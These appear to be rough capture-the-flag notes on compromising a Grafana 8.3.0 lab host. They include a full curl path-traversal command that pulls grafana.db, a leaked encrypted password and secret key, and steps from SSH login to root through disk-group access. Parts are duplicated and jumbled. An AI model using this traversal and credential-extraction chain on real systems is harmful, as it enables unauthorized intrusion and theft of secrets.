PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
3000/tcp open ppp? syn-ack ttl 61
9090/tcp open http syn-ack ttl 61 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
However python3 50581.py /etc/passwd didn:t work.
But, after analyzing the source code of 50581.py, i can try exploit using Burpsuite
check grafana.ini file
Try to download grafana db file
curl --path-as-is http://192.168.237.181:3000/public/plugins/mysql/../../../../../../../../../../../../../var/lib/grafana/grafana.db -O grafana.db -O grafana.db
Use 'DB browser for sqlite tool' to open 'data_source' table
sysadmin / {"basicAuthPassword":"anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w=="}
$IP:3000 --->
searchsploit grafana 8.3.0 -->
Grafana 8.3.0 - Directory Traversal and Arbitrary File Read 50581.pyHowever
python3 50581.py /etc/passwddidn:t work. But, after analyzing the source code of 50581.py, i can try exploit using Burpsuitecheck grafana.ini file
Try to download grafana db file
curl --path-as-is http://192.168.237.181:3000/public/plugins/mysql/../../../../../../../../../../../../../var/lib/grafana/grafana.db -O grafana.db -O grafana.dbUse 'DB browser for sqlite tool' to open 'data_source' table
sysadmin / {"basicAuthPassword":"anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w=="}
Refer to https://github.com/jas502n/Grafana-CVE-2021-43798 https://github.com/jas502n/Grafana-CVE-2021-43798?tab=readme-ov-file
secret_key = SW2YcwTIb9zpOOhoPsMm
AESDecrypt.go file is here: https://github.com/jas502n/Grafana-CVE-2021-43798/blob/main/AESDecrypt.go
ssh with sysadmin credentials --> succeed.
linpeas --> disk group
According to hacktricks,
then, we can ssh with root` id_rsa --> yeah
Refer: